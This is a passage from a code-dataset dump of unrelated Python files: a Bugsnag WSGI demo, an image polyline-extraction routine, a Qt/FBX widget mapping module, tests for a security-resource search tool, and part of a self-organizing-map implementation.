== \"/upload\":\n\n start_response('200 OK', [('Content-Type', 'text/html')])\n return ['
']\n\n elif environ.get('PATH_INFO', '') == \"/uploaded\":\n\n print(Request(environ).form)\n\n raise RuntimeError('hi')\n\n else:\n start_response('404 NOT FOUND', [('Content-Type', 'text/plain')])\n return ['Not Found']\n\n# Configure bugsnag\nbugsnag.configure(api_key=\"066f5ad3590596f9aa8d601ea89af845\")\n\n# Add bugsnag wsgi middleware to app\napplication = BugsnagMiddleware(application)\n\n# Start a server\nprint(\"listening on :8051\")\nhttpd = make_server('localhost', 8051, application)\nhttpd.serve_forever()\n","sub_path":"wsgi/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"559257679","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 9 01:55:14 2019\n\n@author: Daniel\n@author: Imanol Luengo (https://stackoverflow.com/a/37744549/1905613)\n\"\"\"\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import imshow, pause\nimport numpy as np\nfrom sklearn.neighbors import NearestNeighbors\nimport networkx as nx\nimport math\nfrom collections import defaultdict\nfrom skimage.transform import rescale\nfrom scipy.spatial import distance_matrix\nfrom scipy.sparse.csgraph import minimum_spanning_tree, depth_first_order\nfrom dfs import longest_undirected_weighted_path\nimport cv2\nfrom skimage.morphology import skeletonize\nfrom sklearn.neighbors import kneighbors_graph\nimport random\n\n\ndef is_outlier(data, z_score_cutoff = 2.0):\n \"\"\"Uses Robust/Modified Z-score method with Median Absolute Deviation for robust univariate outlier estimation.\n Returns a list of booleans that indicate if element is an outlier.\n z_score_cutoff is the number of MAD deviations the point must exceed to be considered an outlier.\n Fallback to MeanAD in case MAD == 0. 1.486 and 1.253314 approximate standard deviation. Why? 
Unknown.\n See https://www.ibm.com/support/knowledgecenter/SSEP7J_11.1.0/com.ibm.swg.ba.cognos.ug_ca_dshb.doc/modified_z.html\"\"\"\n diff = np.abs(data - np.median(data))\n MAD = np.median(diff)\n MeanAD = np.mean(diff)\n is_outlier = [False] * len(data)\n \n if MAD != 0:\n z_score = diff / (1.486 * MAD )\n else:\n z_score = diff / (1.253314 * MeanAD)\n \n is_outlier = z_score >= z_score_cutoff\n return is_outlier\n\n#disallow edges between points on boundary\ndef ordered_line_from_unordered_points_tree(points_tuple, dimensions, minimum_points, settings):\n \"\"\" Algorithm for extracting a single \"correct\" polyline from pixel edge probablity mask.\n \"\"\"\n# print('\\t\\t\\t\\t' + 'ordered_line_from_unordered_points_tree')\n x = points_tuple[0]\n y = points_tuple[1]\n points = np.c_[x, y]\n k = max(minimum_points - 1, int(np.floor(len(points) * .75)))\n distances = distance_matrix(points, points)\n adjacency_matrix = np.zeros((len(points), len(points)))\n# distances -= 1.0\n mean_cluster_distances = []\n k_closest_indices_list = []\n# min_neighbor_distance = 3\n for row in range(len(distances)):\n k_closest_indices = np.argpartition(distances[row,:], k)[:k]\n# k_nearest_distances = distances[row, k_closest_indices]\n# nearest_distance = distances[row, k_closest_indices[1]] #ensure at least 2 nearby vertices\n adjacency_matrix[row, k_closest_indices] = 1\n# mean_cluster_distances.append(np.mean(k_nearest_distances))\n# k_closest_indices_list.append(k_closest_indices)\n \n indices = list(range(len(x)))\n positions = list(zip(-y, x))\n node_positions = dict(zip(indices, positions))\n# dense_graph_nx = nx.from_numpy_matrix(adjacency_matrix)\n# plt.figure(300 + random.randint(1,500))\n# nx.draw_networkx(dense_graph_nx, pos=node_positions, with_labels=False, node_size = 15)\n# plt.show()\n \n #Eliminate small seperated clusters (outliers/noise)\n# outlier_mask = is_outlier(mean_cluster_distances, z_score_cutoff)\n# print(mean_cluster_distances)\n# for row in range(len(distances)):\n# if outlier_mask[row]:\n# k_closest_indices = k_closest_indices_list[row]\n# adjacency_matrix[row, k_closest_indices] = 0\n \n #use sqrt to penalize large jumps (shorter distances like 1 are given more weight,\n #longer distances reduced more, but longer overall distances are still preserved)\n distances = np.log(distances + 1) * adjacency_matrix\n \n \n mst = minimum_spanning_tree(distances)\n \n \n \n \n #plot intermediate\n # mst_nx = nx.from_scipy_sparse_matrix(mst)\n # plt.figure(800 + random.randint(1,250))\n # nx.draw_networkx(mst_nx, pos=node_positions, with_labels=False, node_size = 15)\n # plt.show()\n \n \n rows, cols = mst.nonzero()\n #penalize long distances after the mst creation\n #this ensures that jumps can still be made, but must connect a reasonable number of new edge\n #in order to account for negative weighting\n #Note, this can't be done before the mst calculation since this would prevent the actual \n #mst from being effectively found\n #zero point is when the distance weighting starts being negative.\n #power is the exponential penalty for longer distances.\n zero_point = 5 if 'polyline_zero_point' not in settings else settings['polyline_zero_point']\n power = 1.5 if 'polyline_distance_power' not in settings else settings['polyline_distance_power']\n new_distances = np.power(zero_point, power) - np.power(np.power(np.e, mst[rows, cols]) - 1, power)\n mst[rows, cols] = np.ravel(new_distances)\n \n# mst[rows, cols] = mst[rows, cols] - np.min([np.min(mst[rows, cols]), 0])\n \n #mst_nx = 
nx.from_scipy_sparse_matrix(mst)\n #plt.figure(1050 + random.randint(1,250))\n #nx.draw_networkx(mst_nx, pos=node_positions, with_labels=False, node_size = 15)\n #plt.show()\n \n #Symmetrize matrix to make undriected\n mst = mst + mst.T - np.diag(mst.diagonal())\n mst_array = np.squeeze(np.asarray(mst))\n #Find longest path\n# print(mst_array)\n length, path_indices = longest_undirected_weighted_path(mst_array)\n \n xx = x[path_indices]\n yy = y[path_indices]\n \n # Create an image to draw the lines on\n image = np.zeros((dimensions[0], dimensions[1], 3))\n \n # Recast the x and y points into usable format for cv2.fillPoly()\n pts = np.vstack((yy,xx)).astype(np.int32).T\n \n # Draw the lane onto the warped blank image\n# plt.plot(left_fitx, ploty, color='yellow')\n cv2.polylines(image, [pts], False, (255, 0, 0), 1)#higher thickness may be necessary, but ddecreases accuracy...\n# image = image[:,:,0]\n# print(pts)\n# image_rescaled = rescale(image, 2, anti_aliasing=False)\n# plt.figure(1300 + random.randint(1,500))\n# plt.imshow(image_rescaled)\n# plt.show()\n \n# edge_bianry = np.where(image > 127.0, 1.0, 0.0)\n# skeleton = skeletonize(edge_bianry)\n# skeleton = np.where(skeleton > 0.5, 255.0, 0.0)\n# edge_bianry[:,:,0] = skeleton\n# plt.figure(1800 + random.randint(1,500))\n# plt.imshow(image)\n# plt.show()\n # image = edge_bianry\n# pause(1)\n# plt.show()\n \n #If start point is further from 0, 0 than end point, reverse.\n start_dist = np.linalg.norm([xx[0], yy[0]])\n end_dist = np.linalg.norm([xx[-1], yy[-1]])\n if start_dist > end_dist:\n xx = np.flip(xx)\n yy = np.flip(yy)\n \n return xx, yy, image\n","sub_path":"postprocessing/ordered_line_from_unordered_points.py","file_name":"ordered_line_from_unordered_points.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"25912780","text":"import csv\n\nebird = 'Ixothraupis guttata'\n\n\ndef search_bySpecies():\n\n with open('request_species.csv', 'r') as csv_file:\n csv_reader = csv.reader(csv_file)\n\n for row in csv_reader:\n print(row[1])\n\n\nsearch_bySpecies()\n","sub_path":".history/demo_20191008085550.py","file_name":"demo_20191008085550.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"277169826","text":"\"\"\"Object to keep track of which widget class should be used for each BfObject or FbxObject\n\nThis can be subclassed for DCC implementations to add more custom widgets.\n\n\"\"\"\nimport fbx\nfrom brenfbx.core import bfCore\nfrom brenpy.core import bpDebug\nfrom brenfbx.qt import bfQtCore\n\n# bf object imports\nfrom brenfbx.fbxsdk.core import bfObject\nfrom brenfbx.objects import bfCustomObjects\nfrom brenfbx.objects.evaluators import bfEvaluators\nfrom brenfbx.objects.evaluators import bfModifiers\nfrom brenfbx.fbxsdk.scene.constraint import bfConstraint\nfrom brenfbx.fbxsdk.scene.constraint import bfConstraintAim\n\n# widget imports\nfrom brenfbx.qt.object import bfQtObjectWidgets\nfrom brenfbx.qt.object import bfCustomObjectWidgets\nfrom brenfbx.qt.object import bfQtNodeWidgets\nfrom brenfbx.qt.constraint import bfQtConstraintWidgets\nfrom brenfbx.qt.object.evaluation_objects import bfQtEvaluationObjectWidgets\nfrom brenfbx.qt.object.evaluation_objects import bfQtModifierWidgets\n\nBF_MAPPING = [\n # bf objects\n # (bfCustomObjects.BfNoteObject, bfCustomObjectWidgets.BfNoteObjectEditorWidget),\n # 
(bfCustomObjects.BfSceneFilterObject, bfCustomObjectWidgets.BfSceneFilterObjectEditorWidget),\n # # modifiers\n # (bfModifiers.BfAlignPositionModifier, bfQtModifierWidgets.BfAlignPositionModifierEditorWidget),\n # (bfModifiers.BfAlignRotationModifier, bfQtModifierWidgets.BfAlignRotationModifierEditorWidget),\n # (bfModifiers.BfAimModifier, bfQtModifierWidgets.BfAimModifierEditorWidget),\n # (bfModifiers.BfPreRotateModifier, bfQtModifierWidgets.BfPreRotationModifierEditorWidget),\n # (bfModifiers.BfRotateOrderModifier, bfQtModifierWidgets.BfRotateOrderModifierEditorWidget),\n # (bfModifiers.BfRotateToPreRotateModifier, bfQtModifierWidgets.BfNodeModifierEditorWidget),\n # (bfModifiers.BfAddChildModifier, bfQtModifierWidgets.BfAddChildModifierEditorWidget),\n # # constraints\n # (bfConstraint.BfConstraintParent, bfQtConstraintWidgets.BfConstraintParentEditorWidget),\n # (bfConstraint.BfConstraintAim, bfQtConstraintWidgets.BfConstraintAimEditorWidget),\n # (bfConstraint.BfConstraintPosition, bfQtConstraintWidgets.BfConstraintPositionEditorWidget),\n # (bfConstraint.BfConstraintRotation, bfQtConstraintWidgets.BfConstraintRotationEditorWidget),\n # (bfConstraint.BfConstraintScale, bfQtConstraintWidgets.BfConstraintScaleEditorWidget),\n # # node modifier default\n # (bfModifiers.BfNodeModifier, bfQtModifierWidgets.BfNodeModifierEditorWidget),\n # # evaluation objects\n (bfEvaluators.BfFbxBuild, bfQtEvaluationObjectWidgets.BfFbxBuildEditorWidget),\n (bfEvaluators.BfEvaluationGroup, bfQtEvaluationObjectWidgets.BfEvaluationGroupEditorWidget),\n # (bfObject.BfEvaluationObject, bfQtObjectWidgets.BfEvaluationObjectEditorWidget),\n]\n\nFBX_MAPPING = [\n # (fbx.FbxConstraintParent, bfQtConstraintWidgets.BfConstraintParentEditorWidget),\n # (fbx.FbxConstraintAim, bfQtConstraintWidgets.BfConstraintAimEditorWidget),\n # (fbx.FbxConstraintPosition, bfQtConstraintWidgets.BfConstraintPositionEditorWidget),\n # (fbx.FbxConstraintRotation, bfQtConstraintWidgets.BfConstraintRotationEditorWidget),\n # (fbx.FbxConstraintScale, bfQtConstraintWidgets.BfConstraintScaleEditorWidget),\n # (fbx.FbxNode, bfQtNodeWidgets.BfNodeEditorWidget),\n # (fbx.FbxSkeleton, bfQtNodeWidgets.BfSkeletonEditorWidget),\n # anything else defaults to FbxObjectEditorWidget\n (fbx.FbxObject, bfQtObjectWidgets.BfObjectEditorWidget),\n]\n\n\nBF_AE_MAPPING = [\n # bf objects\n (bfCustomObjects.BfNoteObject, bfCustomObjectWidgets.BfNoteObjectAEWidget),\n (bfCustomObjects.BfSceneFilterObject, bfCustomObjectWidgets.BfSceneFilterObjectAEWidget),\n # modifiers\n (bfModifiers.BfAlignPositionModifier, bfQtModifierWidgets.BfAlignPositionModifierAEWidget),\n (bfModifiers.BfAlignRotationModifier, bfQtModifierWidgets.BfAlignRotationModifierAEWidget),\n (bfModifiers.BfAimModifier, bfQtModifierWidgets.BfAimModifierAEWidget),\n (bfModifiers.BfPreRotateModifier, bfQtModifierWidgets.BfPreRotationModifierAEWidget),\n (bfModifiers.BfRotateOrderModifier, bfQtModifierWidgets.BfRotateOrderModifierAEWidget),\n (bfModifiers.BfRotateToPreRotateModifier, bfQtModifierWidgets.BfNodeModifierAEWidget),\n (bfModifiers.BfAddChildModifier, bfQtModifierWidgets.BfAddChildModifierAEWidget),\n # constraints\n (bfConstraint.BfConstraintParent, bfQtConstraintWidgets.BfConstraintParentAEWidget),\n (bfConstraintAim.BfConstraintAim, bfQtConstraintWidgets.BfConstraintAimAEWidget),\n (bfConstraint.BfConstraintPosition, bfQtConstraintWidgets.BfConstraintPositionAEWidget),\n (bfConstraint.BfConstraintRotation, bfQtConstraintWidgets.BfConstraintRotationAEWidget),\n 
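# NOTE: entries below are matched in order by isinstance (see get_object_ae_widget_class), so more specific classes must be listed above their base classes\n    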
(bfConstraint.BfConstraintScale, bfQtConstraintWidgets.BfConstraintScaleAEWidget),\n    # node modifier default\n    (bfModifiers.BfNodeModifier, bfQtModifierWidgets.BfNodeModifierAEWidget),\n    # evaluation objects\n    (bfEvaluators.BfFbxBuild, bfQtEvaluationObjectWidgets.BfFbxBuildAEWidget),\n    (bfEvaluators.BfEvaluationGroup, bfQtEvaluationObjectWidgets.BfEvaluationGroupAEWidget),\n    (bfObject.BfEvaluationObject, bfQtObjectWidgets.BfEvaluationObjectAEWidget),\n]\n\nFBX_AE_MAPPING = [\n    (fbx.FbxConstraintParent, bfQtConstraintWidgets.BfConstraintParentAEWidget),\n    (fbx.FbxConstraintAim, bfQtConstraintWidgets.BfConstraintAimAEWidget),\n    (fbx.FbxConstraintPosition, bfQtConstraintWidgets.BfConstraintPositionAEWidget),\n    (fbx.FbxConstraintRotation, bfQtConstraintWidgets.BfConstraintRotationAEWidget),\n    (fbx.FbxConstraintScale, bfQtConstraintWidgets.BfConstraintScaleAEWidget),\n    (fbx.FbxNode, bfQtNodeWidgets.BfNodeAEWidget),\n    (fbx.FbxSkeleton, bfQtNodeWidgets.BfSkeletonAEWidget),\n]\n\n\ndef get_object_ae_widget_class(bf_object, bf_mapping=None, fbx_mapping=None):\n    \"\"\"Find the appropriate object attributes editor widget class.\n    \"\"\"\n    if bf_mapping is None:\n        bf_mapping = BF_AE_MAPPING\n    if fbx_mapping is None:\n        fbx_mapping = FBX_AE_MAPPING\n\n    # first look for a custom bf object widget\n    for bf_cls, ae_widget_cls in bf_mapping:\n        if isinstance(bf_object, bf_cls):\n            return ae_widget_cls\n\n    # if we're not using a custom bf object widget then find an fbx object widget\n    for fbx_cls, ae_widget_cls in fbx_mapping:\n        if isinstance(bf_object.fbx_object(), fbx_cls):\n            return ae_widget_cls\n\n    # if we don't find a mapped editor then simply return None to indicate there's nothing we want to edit\n    return None\n\nclass BfObjectWidgetMapping(\n    bfQtCore.BfQtWidgetMappingBase\n):\n\n    def __init__(self, *args, **kwargs):\n        super(BfObjectWidgetMapping, self).__init__(*args, **kwargs)\n\n        self._bf_object_widget_mapping = BF_MAPPING\n        self._bf_object_ae_widget_mapping = BF_AE_MAPPING\n        self._fbx_object_widget_mapping = FBX_MAPPING\n        self._fbx_object_ae_widget_mapping = FBX_AE_MAPPING\n\n    def bf_object_widget_mapping(self):\n        return self._bf_object_widget_mapping\n\n    def bf_object_ae_widget_mapping(self):\n        return self._bf_object_ae_widget_mapping\n\n    def add_bf_object_widget_mapping(self, value):\n\n        # check value\n        err_msg = \"object mapping must be tuple of (BfObject, BfObjectWidget)\"\n\n        if not isinstance(value, (list, tuple)):\n            raise bfCore.BfError(err_msg)\n        if len(value) != 2:\n            raise bfCore.BfError(err_msg)\n        if not isinstance(value[0], bfCore.BfObjectBase):\n            raise bfCore.BfError(err_msg)\n        if not isinstance(value[1], bfQtObjectWidgets.BfObjectEditorWidget):\n            raise bfCore.BfError(err_msg)\n\n        self._bf_object_widget_mapping.append(tuple(value))\n        return True\n\n    def fbx_object_widget_mapping(self):\n        return self._fbx_object_widget_mapping\n\n    def get_object_editor_widget_class(self, bf_object):\n        \"\"\"Find the appropriate object editor widget class.\n\n        Chooses from a mapping of object class to object editor widget;\n        items towards the top of the list take precedence over ones below.\n        FbxObject should always be last in the list to serve as the default editor.\n\n        Or override this method in a subclass to return custom editors,\n        with super as the fallback default.\n        \"\"\"\n        # first look for a custom bf object widget\n        for bf_cls, editor_cls in self._bf_object_widget_mapping:\n            if isinstance(bf_object, bf_cls):\n                return editor_cls\n\n        # if we're not using a custom bf object widget then find an fbx object widget\n        
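# FbxObject is registered last in FBX_MAPPING as the catch-all default, so in theory this loop always returns a widget class\n        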
for fbx_cls, editor_cls in self._fbx_object_widget_mapping:\n if isinstance(bf_object.fbx_object(), fbx_cls):\n return editor_cls\n\n # redundant error, in theory getting to this point should be impossible\n raise bfQtCore.BfQtError(\"Failed to find suitable object editor class: {} {} {}\".format(\n bf_object.fbx_object().GetName(), bf_object, bf_object.fbx_object()\n ))\n\n def get_object_ae_widget_class(self, bf_object):\n \"\"\"Find appropriate object attributes editor widget class.\n \"\"\"\n return get_object_ae_widget_class(\n bf_object,\n bf_mapping=self._bf_object_ae_widget_mapping,\n fbx_mapping=self._fbx_object_ae_widget_mapping\n )\n","sub_path":"python/brenfbx/qt/object/bfObjectWidgetMapping.py","file_name":"bfObjectWidgetMapping.py","file_ext":"py","file_size_in_byte":9304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"149853357","text":"\"\"\"Test file for search File\"\"\"\nfrom unittest import TestCase\n\nfrom rawsec_cli.search import searchProject\nfrom rawsec_cli.search import searchProjectCTF\nfrom rawsec_cli.search import searchProjectOperating\nfrom rawsec_cli.search import searchProjectResources\nfrom rawsec_cli.search import searchProjectTools\n\n\nclass TestSearch(TestCase):\n \"\"\"Test search class\"\"\"\n\n def setUp(self):\n \"\"\"setup test\"\"\"\n self.json = {\n \"tools\": {\"binary_exploitation\": {\"tools\": [{\"name\": \"tools\"}]}},\n \"resources\": {\n \"binary_exploitation\": {\"resources\": [{\"name\": \"resources\"}]},\n },\n \"operating_systems\": {\n \"binary_exploitation\": {\n \"operating_systems\": [{\"os\": \"operating_systems\"}],\n },\n },\n \"ctf_platforms\": {\n \"binary_exploitation\": {\n \"ctf_platforms\": [{\"name\": \"ctf_platforms\"}],\n },\n },\n }\n\n def testSearchProjectTools(self):\n \"\"\"test searchProjectTools function\"\"\"\n self.assertEqual(\n searchProjectTools(self.json, \"tools\"),\n [{\"name\": \"tools\"}],\n )\n\n def testSearchProjectResources(self):\n \"\"\"test searchProjectResources function\"\"\"\n self.assertEqual(\n searchProjectResources(self.json, \"resources\"),\n [{\"name\": \"resources\"}],\n )\n\n def testSearchProjectCTF(self):\n \"\"\"test searchProjectCTF function\"\"\"\n self.assertEqual(\n searchProjectCTF(self.json, \"ctf_platforms\"),\n [{\"name\": \"ctf_platforms\"}],\n )\n\n def testSearchProjectOperating(self):\n \"\"\"test searchProjectOperating function\"\"\"\n self.assertEqual(\n searchProjectOperating(self.json, \"operating_systems\"),\n [{\"os\": \"operating_systems\"}],\n )\n\n def testSearchProject(self):\n \"\"\"test searchProject function\"\"\"\n self.assertEqual(\n searchProject(self.json, \"tools\"),\n [{\"name\": \"tools\"}],\n )\n","sub_path":"tests/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"617190672","text":"import csv\nfrom math import sqrt\n\nfrom numpy import (array, unravel_index, nditer, linalg, random, subtract, max,\n power, exp, pi, zeros, ones, arange, outer, meshgrid, dot,\n logical_and, mean, std, cov, argsort, linspace, transpose,\n einsum, prod, nan, sqrt, hstack, diff, argmin, multiply)\nfrom numpy import sum as npsum\nfrom numpy.linalg import norm\nfrom collections import defaultdict, Counter\nfrom warnings import warn\nfrom sys import stdout\nfrom time import time\nfrom datetime import timedelta\nimport pickle\nimport os\nimport math\nfrom sklearn.preprocessing 
import MinMaxScaler\n\nfrom numpy.testing import assert_almost_equal, assert_array_almost_equal\nfrom numpy.testing import assert_array_equal\nimport unittest\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing as pre\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport cv2\n\"\"\"\n    Minimalistic implementation of the Self-Organizing Map (SOM).\n\"\"\"\n\n\ndef _build_iteration_indexes(data_len, num_iterations,\n                             verbose=True, random_generator=None):\n    \"\"\"Returns an iterable with the indexes of the samples\n    to pick at each iteration of the training.\n\n    If random_generator is not None, it must be an instance\n    of numpy.random.RandomState and it will be used\n    to randomize the order of the samples.\"\"\"\n    iterations = arange(num_iterations) % data_len\n    if random_generator:\n        random_generator.shuffle(iterations)\n    if verbose:\n        return _wrap_index__in_verbose(iterations)\n    else:\n        return iterations\n\n\ndef _wrap_index__in_verbose(iterations):\n    \"\"\"Yields the values in iterations printing the status on the stdout.\"\"\"\n    m = len(iterations)\n    digits = len(str(m))\n    progress = '\\r [ {s:{d}} / {m} ] {s:3.0f}% - ? it/s'\n    progress = progress.format(m=m, d=digits, s=0)\n    stdout.write(progress)\n    beginning = time()\n    stdout.write(progress)\n    for i, it in enumerate(iterations):\n        yield it\n        sec_left = ((m-i+1) * (time() - beginning)) / (i+1)\n        time_left = str(timedelta(seconds=sec_left))[:7]\n        progress = '\\r [ {i:{d}} / {m} ]'.format(i=i+1, d=digits, m=m)\n        progress += ' {p:3.0f}%'.format(p=100*(i+1)/m)\n        progress += ' - {time_left} left '.format(time_left=time_left)\n        stdout.write(progress)\n\n\ndef fast_norm(x):\n    \"\"\"Returns norm-2 of a 1-D numpy array.\n\n    * faster than linalg.norm in case of 1-D arrays (numpy 1.9.2rc1).\n    \"\"\"\n    return sqrt(dot(x, x.T))\n\n\ndef asymptotic_decay(learning_rate, t, max_iter):\n    \"\"\"Decay function of the learning process.\n    Parameters\n    ----------\n    learning_rate : float\n        current learning rate.\n\n    t : int\n        current iteration.\n\n    max_iter : int\n        maximum number of iterations for the training.\n    \"\"\"\n    #return learning_rate / (1+t/(max_iter/2))  # the original function; changed here\n    decay = 0.49*(1-t/max_iter)+0.01  # the minimum value is 0.01, the initial learning rate is 0.5\n    return decay\n\n\nclass MiniSom(object):\n    def __init__(self,traindata, x, y, input_len,kernel,stride, Epsilon,sigma=1.0, learning_rate=0.5,\n                 decay_function=asymptotic_decay,\n                 neighborhood_function='gaussian', topology='rectangular',\n                 activation_distance='euclidean', random_seed=None):\n        \"\"\"Initializes a Self-Organizing Map.\n\n        A rule of thumb to set the size of the grid for a dimensionality\n        reduction task is that it should contain 5*sqrt(N) neurons\n        where N is the number of samples in the dataset to analyze.\n\n        E.g. 
if your dataset has 150 samples, 5*sqrt(150) = 61.23\n        hence a map 8-by-8 should perform well.\n\n        Parameters\n        ----------\n        x : int\n            x dimension of the SOM.\n\n        y : int\n            y dimension of the SOM.\n\n        input_len : int\n            Number of the elements of the vectors in input.\n\n        sigma : float, optional (default=1.0)\n            Spread of the neighborhood function, needs to be adequate\n            to the dimensions of the map.\n            (at the iteration t we have sigma(t) = sigma / (1 + t/T)\n            where T is #num_iteration/2)\n        learning_rate : initial learning rate\n            (at the iteration t we have\n            learning_rate(t) = learning_rate / (1 + t/T)\n            where T is #num_iteration/2)\n\n        decay_function : function (default=None)\n            Function that reduces learning_rate and sigma at each iteration\n            the default function is:\n                        learning_rate / (1+t/(max_iterations/2))\n\n            A custom decay function will need to take in input\n            three parameters in the following order:\n\n            1. learning rate\n            2. current iteration\n            3. maximum number of iterations allowed\n\n\n            Note that if a lambda function is used to define the decay\n            MiniSom will not be picklable anymore.\n\n        neighborhood_function : string, optional (default='gaussian')\n            Function that weights the neighborhood of a position in the map.\n            Possible values: 'gaussian', 'mexican_hat', 'bubble', 'triangle'\n\n        topology : string, optional (default='rectangular')\n            Topology of the map.\n            Possible values: 'rectangular', 'hexagonal'\n\n        activation_distance : string, optional (default='euclidean')\n            Distance used to activate the map.\n            Possible values: 'euclidean', 'cosine', 'manhattan', 'chebyshev'\n\n        random_seed : int, optional (default=None)\n            Random seed to use.\n        \"\"\"\n        if sigma >= x or sigma >= y:\n            warn('Warning: sigma is too high for the dimension of the map.')\n\n        self._random_generator = random.RandomState(random_seed)  # random number generator used to draw samples in [0, 1)\n        self._learning_rate = learning_rate  # initial learning rate\n        self._sigma = sigma  # initial neighborhood spread; 1 means full coverage, and sigma keeps shrinking over the iterations: sigma(t) = sigma / (1 + t/T)\n        self._input_len = input_len  # dimensionality of the input vectors, and therefore of the weights\n        # random initialization\n        self._weights = self._random_generator.rand(x, y, input_len)*2-1  # randomly initialized weight matrix in [-1, 1)\n        self._weights /= linalg.norm(self._weights, axis=-1, keepdims=True)  # normalize the weights; linalg.norm defaults to the 2-norm, axis=-1 takes it per row vector, keepdims preserves the shape\n\n        self._activation_map = zeros((x, y))  # zero matrix the same size as the map, used to record activations\n        self._neigx = arange(x)  # the index list [0, 1, ..., x-1]\n        self._neigy = arange(y)  # used to evaluate the neighborhood function matrix\n\n        if topology not in ['hexagonal', 'rectangular']:  # decide between hexagonal and rectangular grids\n            msg = '%s not supported; only hexagonal and rectangular available'\n            raise ValueError(msg % topology)\n        self.topology = topology  # store the grid topology\n        self._xx, self._yy = meshgrid(self._neigx, self._neigy)  # coordinate matrices of the grid\n        self._xx = self._xx.astype(float)  # cast the coordinates to float\n        self._yy = self._yy.astype(float)\n        if topology == 'hexagonal':\n            self._xx[::-2] -= 0.5\n            if neighborhood_function in ['triangle']:\n                warn('triangle neighborhood function does not ' +\n                     'take in account hexagonal topology')\n\n        self._decay_function = decay_function  # learning-rate decay function, learning_rate / (1+t/(max_iter/2))\n\n        neig_functions = {'gaussian': self._gaussian,\n                          }\n\n        if neighborhood_function not in neig_functions:\n            msg = '%s not supported. 
Functions available: %s'\n            raise ValueError(msg % (neighborhood_function,\n                                    ', '.join(neig_functions.keys())))\n\n        if neighborhood_function in ['triangle',\n                                     'bubble'] and (divmod(sigma, 1)[1] != 0\n                                                    or sigma < 1):\n            warn('sigma should be an integer >=1 when triangle or bubble ' +\n                 'are used as neighborhood function')\n\n        self.neighborhood = neig_functions[neighborhood_function]  # select the neighborhood function\n\n        distance_functions = {'euclidean': self._euclidean_distance,\n                              }\n\n        if activation_distance not in distance_functions:\n            msg = '%s not supported. Distances available: %s'\n            raise ValueError(msg % (activation_distance,\n                                    ', '.join(distance_functions.keys())))\n\n        self._activation_distance = distance_functions[activation_distance]  # similarity function, usually euclidean distance; to use a fuzzy variant, change this and add a fuzzy distance function here\n        self.kernel = kernel  # sliding-window size, e.g. [3, 3]\n        self.stride = stride  # sliding-window stride\n        self.Epsilon = Epsilon  # stopping condition for fuzzy training\n        self.w_distance = 100  # tracks the magnitude of the weight changes, used to terminate training\n        self.spldata = []  # features grouped per image\n        self.allfeature = []  # all features of all images, used to initialize the weights and to compute the training error\n        self.traindata = traindata\n        self.processdata(self.traindata)\n        self.x = x\n        self.y = y\n\n    def _activate(self, x):  # x is a single input vector\n        \"\"\"Updates matrix activation_map, in this matrix\n           the element i,j is the response of the neuron i,j to x.\"\"\"\n        self._activation_map = self._activation_distance(x, self._weights)  # matrix of distances from x to every weight vector\n\n    def activate(self, x):\n        \"\"\"Returns the activation map to x.\"\"\"\n        self._activate(x)\n        return self._activation_map  # distance matrix between x and every weight vector\n\n\n\n    def _euclidean_distance(self, x, w):  # euclidean distance: sqrt(sum((xi - wi)^2))\n        return linalg.norm(subtract(x, w), axis=-1)  # returns the distance matrix\n\n    def _check_input_len(self, data):\n        \"\"\"Checks that the data in input is of the correct shape.\"\"\"\n        data_len = len(data[0])  # self.kernel[0]*self.kernel[1]\n        if self._input_len != data_len:\n            msg = 'Received %d features, expected %d.' 
% (data_len,\n                                                        self._input_len)\n            raise ValueError(msg)\n\n    def _gaussian(self, c, sigma):  # gaussian kernel f(x) = e^[-(x-b)^2 / 2c]\n        \"\"\"Returns a Gaussian centered in c.\"\"\"\n        \"\"\"f(x)=ae^[-(x-b)^2/2c^2]\n        a=1/(sigma*sqrt(2*pi))\"\"\"\n        # c is the coordinate [x, y]\n        # 2-D gaussian: f(x,y) = e^[-((x-x0)^2/2sigma + (y-y0)^2/2sigma)] = e^[-(x-x0)^2/2sigma] * e^[-(y-y0)^2/2sigma]\n        d = 2 * pi * sigma * sigma  # pi * r * r, the area of a circle\n        ax = exp(-power(self._xx - self._xx.T[c], 2) / d)  # power(x, y) returns x to the power y (y may be an array or a scalar): e^[-(x-x0)^2/2sigma]\n        ay = exp(-power(self._yy - self._yy.T[c], 2) / d)  # e^[-(y-y0)^2/2sigma]\n        # the product of the two 1-D terms gives the 2-D gaussian above\n        # print(\"neiborhood function\",(ax * ay).T)\n        return (ax * ay).T  # the external product gives a matrix with element-wise multiplication\n    def _triangle(self, c, sigma):\n        \"\"\"Triangular function centered in c with spread sigma.\"\"\"\n        triangle_x = (-abs(c[0] - self._neigx)) + sigma\n        triangle_y = (-abs(c[1] - self._neigy)) + sigma\n        triangle_x[triangle_x < 0] = 0.\n        triangle_y[triangle_y < 0] = 0.\n        return outer(triangle_x, triangle_y)\n    def winner(self, x):\n        \"\"\"Computes the coordinates of the winning neuron for the sample x.\"\"\"\n        self._activate(x)  # self._activation_map = self._activation_distance(x, self._weights), the matrix of distances from x to every weight\n        return unravel_index(self._activation_map.argmin(),\n                             self._activation_map.shape)  # find the minimum and return its coordinates [x, y]\n\n\n    def quantization(self, data):\n        \"\"\"Assigns a code book (weights vector of the winning neuron)\n        to each sample in data.\"\"\"\n        self._check_input_len(data)\n        winners_coords = argmin(self._distance_from_weights(data), axis=1)\n        return self._weights[unravel_index(winners_coords,\n                                           self._weights.shape[:2])]\n\n    def forecast_weights_init(self,filename):\n        \"\"\"Initializes the weights of the SOM\n        from a file of previously trained weights.\"\"\"\n        # load the pre-trained weights\n        self._weights = np.load(filename)\n\n    def processdata(self, data):\n        for iteration in data:\n            # extract features from the data first; each iteration holds 3 arrays storing the r, g, b channels\n            features = 